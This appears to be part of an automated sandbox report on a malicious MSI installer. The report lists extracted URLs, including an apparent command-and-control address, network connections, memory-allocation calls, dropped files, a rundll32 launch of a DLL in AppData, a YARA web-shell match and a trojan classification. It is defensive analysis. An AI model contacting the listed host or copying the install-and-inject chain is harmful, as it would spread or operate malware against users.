            Source: rundll32.exe, 00000006.00000003.3335114775.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://samomol.com/
            Source: rundll32.exe, 00000006.00000003.3335114775.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://samomol.com/0P4a
            Source: rundll32.exe, 00000006.00000003.3335114775.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://samomol.com:9043/
            Source: rundll32.exe, 00000006.00000003.3335114775.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://samomol.com:9043/pankihoy.php
            Source: rundll32.exe, 00000006.00000003.3335114775.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://samomol.com:9043/pankihoy.php32
            Source: rundll32.exe, 00000006.00000003.3335114775.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://samomol.com:9043/pankihoy.php8O;a
            Source: rundll32.exe, 00000006.00000003.3335114775.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://samomol.com:9043/pankihoy.phpXP
            Source: rundll32.exe, 00000006.00000003.3335114775.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://samomol.com:9043/pankihoy.phpaOda
            Source: rundll32.exe, 00000006.00000003.3335114775.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://samomol.com:9043/pankihoy.phpd
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 00000008.00000000.2238643975.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3075025138.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2980638609.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/e
            Source: explorer.exe, 00000008.00000000.2242782012.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3083287941.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2980843458.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4590045694.000000000C086000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comM
            Source: medk.msi, MSI8F42.tmp.2.dr, MSI8D89.tmp.2.dr, MSI8D3A.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8E67.tmp.2.dr, MSI8DD8.tmp.2.dr, MSI8E17.tmp.2.drString found in binary or memory: https://www.advancedinstaller.com
            Source: medk.msi, MSI8F42.tmp.2.dr, MSI8D89.tmp.2.dr, MSI8D3A.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8E67.tmp.2.dr, MSI8DD8.tmp.2.dr, MSI8E17.tmp.2.drString found in binary or memory: https://www.digicert.com/CPS0
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
            Source: medk.msi, MSI8F42.tmp.2.dr, MSI8D89.tmp.2.dr, MSI8D3A.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8E67.tmp.2.dr, MSI8DD8.tmp.2.dr, MSI8E17.tmp.2.drString found in binary or memory: https://www.thawte.com/cps0/
            Source: medk.msi, MSI8F42.tmp.2.dr, MSI8D89.tmp.2.dr, MSI8D3A.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8E67.tmp.2.dr, MSI8DD8.tmp.2.dr, MSI8E17.tmp.2.drString found in binary or memory: https://www.thawte.com/repository0W
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
            Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
            Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
            Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
            Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
            Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
            Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
            Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
            Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
            Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
            Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
            Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
            Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
            Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
            Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
            Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50086 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
            Source: unknown HTTPS traffic detected: 104.21.92.105:443 -> 192.168.2.6:49988 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 104.21.15.162:443 -> 192.168.2.6:49989 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 104.21.15.162:443 -> 192.168.2.6:50001 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 104.21.92.105:443 -> 192.168.2.6:50026 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 104.21.92.105:443 -> 192.168.2.6:50077 version: TLS 1.2

            System Summary

            Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR Matched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
            Source: C:\Windows\explorer.exe Process Stats: CPU usage > 49%
            Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000293134ED279 NtAllocateVirtualMemory
            Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000293134ED2E9 NtProtectVirtualMemory
            Source: C:\Windows\explorer.exe Code function: 8_2_02E082B4 NtFreeVirtualMemory
            Source: C:\Windows\explorer.exe Code function: 8_2_02E0B388 NtAllocateVirtualMemory
            Source: C:\Windows\explorer.exe Code function: 8_2_02E0C704 NtDelayExecution
            Source: C:\Windows\explorer.exe Code function: 8_2_02E080B8 RtlInitUnicodeString,NtCreateFile
            Source: C:\Windows\explorer.exe Code function: 8_2_02E08240 NtClose
            Source: C:\Windows\explorer.exe Code function: 8_2_02E081C8 NtWriteFile
            Source: C:\Windows\explorer.exe Code function: 8_2_02E101A0 NtFreeVirtualMemory,CreateMutexExW
            Source: C:\Windows\explorer.exe Code function: 8_2_02E10130 NtAllocateVirtualMemory
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\6d8c4f.msi
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI8D3A.tmp
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI8D89.tmp
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI8DD8.tmp
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI8E17.tmp
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\SourceHash{5AB6B0C5-5CD6-4CF7-ABF4-4E467A0D78CE}
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI8E67.tmp
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI8F42.tmp
            Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSI8D3A.tmp
            Source: C:\Windows\Installer\MSI8F42.tmp Code function: String function: 00313292 appears 70 times
            Source: C:\Windows\Installer\MSI8F42.tmp Code function: String function: 0031325F appears 103 times
            Source: C:\Windows\Installer\MSI8F42.tmp Code function: String function: 00313790 appears 39 times
            Source: medk.msi Binary or memory string: OriginalFilenameviewer.exeF vs medk.msi
            Source: medk.msi Binary or memory string: OriginalFilenameAICustAct.dllF vs medk.msi
            Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR Matched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
            Source: tab.dll.2.drBinary string: \BaseNamedObjects\NODCOMM%08XTo%08XCommPortAlpcNOD_SHEVT_%s%xSession\%u\NOD_SHMEM_%s%x\\\Device\\\.\MountPointManager\Device\LanmanRedirector\;%c:SystemRootMup\LanmanRedirector\NwRdr\NetWareRedirector\;LanmanRedirector\SystemHarddiskVolume%d%c:HarddiskDmVolumesS-%lu-0x%02hx%02hx%02hx%02hx%02hx%02hx%lu-%lu\NODSTSIBM037IBM437IBM500ASMO-708DOS-720ibm737ibm775ibm850ibm852IBM855ibm857IBM00858IBM860ibm861DOS-862IBM862IBM863IBM864IBM865cp866IBM866ibm869IBM870windows-874TIS-620cp875shift_jisshift-jisgb2312gb_2312-80gbkwindows-936ks_c_5601-1987EUC-KRbig5x-x-big5IBM1026IBM01047IBM01140IBM01141IBM01142IBM01143IBM01144IBM01145IBM01146IBM01147IBM01148IBM01149utf-16unicodeFFFEwindows-1250windows-1251windows-1252windows-1253windows-1254windows-1255windows-1256windows-1257windows-1258Johabmacintoshx-mac-japanesex-mac-chinesetradx-mac-koreanx-mac-arabicx-mac-hebrewx-mac-greekx-mac-cyrillicx-mac-chinesesimpx-mac-romanianx-mac-ukrainianx-mac-thaix-mac-cex-mac-icelandicx-mac-turkishx-mac-croatianutf-32utf-32BEx-Chinese_CNSx-cp20001x_Chinese-Etenx-cp20003x-cp20004x-cp20005x-IA5x-IA5-Germanx-IA5-Swedishx-IA5-Norwegianus-asciix-cp20261x-cp20269IBM273IBM277IBM278IBM280IBM284IBM285IBM290IBM297IBM420IBM423IBM424x-EBCDIC-KoreanExtendedIBM-Thaikoi8-rIBM871IBM880IBM905IBM00924EUC-JPx-cp20936x-cp20949cp1025koi8-uiso-8859-1iso-8859-2iso-8859-3iso-8859-4iso-8859-5iso-8859-6iso-8859-7iso-8859-8iso-8859-9iso-8859-13iso-8859-15x-Europaiso-8859-8-iiso-2022-jpcsISO2022JPiso-2022-krx-cp50227euc-jpEUC-CNeuc-krhz-gb-2312GB18030x-iscii-dex-iscii-bex-iscii-tax-iscii-tex-iscii-asx-iscii-orx-iscii-kax-iscii-max-iscii-gux-iscii-pautf-7utf-8%
            Source: classification engine Classification label: mal100.troj.evad.winMSI@9/24@4/4
            Source: C:\Windows\Installer\MSI8F42.tmp Code function: 4_2_002F3860 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle
            Source: C:\Windows\Installer\MSI8F42.tmp Code function: 4_2_002F4BA0 CoInitialize,CoCreateInstance,VariantInit,VariantClear,IUnknown_QueryService,IUnknown_QueryInterface_Proxy,IUnknown_QueryInterface_Proxy,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error
            Source: C:\Windows\Installer\MSI8F42.tmp Code function: 4_2_002F45B0 LoadResource,LockResource,SizeofResource
            Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\Microsoft\CML8E91.tmp
            Source: C:\Windows\System32\rundll32.exe Mutant created: NULL
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\TEMP\~DF4DA8C45DC3BE49B0.TMP
            Source: C:\Windows\Installer\MSI8F42.tmp Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\tab.dll, Object
            Source: rundll32.exe, 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp, tab.dll.2.dr Binary or memory string: UPDATE MsgPrefix SET JustCreatedFlag = 0 WHERE MsgPrefixID = ?;
            Source: rundll32.exe, 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp, tab.dll.2.dr Binary or memory string: INSERT INTO CacheDbInfo(DbVersion, UsingAdditionalSemiUniqueID, LastMaintenanceTimestamp) VALUES(?, ?, ?);
            Source: rundll32.exe, 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp, tab.dll.2.dr Binary or memory string: CREATE TABLE MsgCache(MsgRowid INTEGER PRIMARY KEY, MsgPrefixID INTEGER, MsgID BLOB NOT NULL, LastUsedTimestamp INTEGER, RecordFlags INTEGER, AVData BLOB, ASData BLOB);
            Source: rundll32.exe, 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp, tab.dll.2.dr Binary or memory string: SELECT MsgRowid, AVData, ASData, LastUsedTimestamp, RecordFlags FROM MsgCache WHERE MsgID = ? AND MsgPrefixID = ?;
            Source: rundll32.exe, 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp, tab.dll.2.dr Binary or memory string: SELECT MsgRowid, AVData, ASData, LastUsedTimestamp, RecordFlags, AdditionalSemiUniqueID FROM MsgCache WHERE MsgID = ? AND MsgPrefixID = ?;
            Source: rundll32.exe, 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp, tab.dll.2.dr Binary or memory string: INSERT INTO TempDb.MsgPrefixRowsToDelete SELECT MsgPrefixID FROM MsgPrefix WHERE MsgPrefixID NOT IN (SELECT DISTINCT MsgPrefixID FROM MsgCache) AND (JustCreatedFlag = 0 OR JustCreatedFlag < ? OR JustCreatedFlag > ?);
            Source: rundll32.exe, 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp, tab.dll.2.dr Binary or memory string: CREATE TABLE MsgPrefix(MsgPrefixID INTEGER PRIMARY KEY, MsgPrefixData BLOB NOT NULL, JustCreatedFlag INTEGER);
            Source: rundll32.exe, 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp, tab.dll.2.dr Binary or memory string: CREATE TABLE TempDb.MsgPrefixRowsToDelete(MsgPrefixID INTEGER PRIMARY KEY);
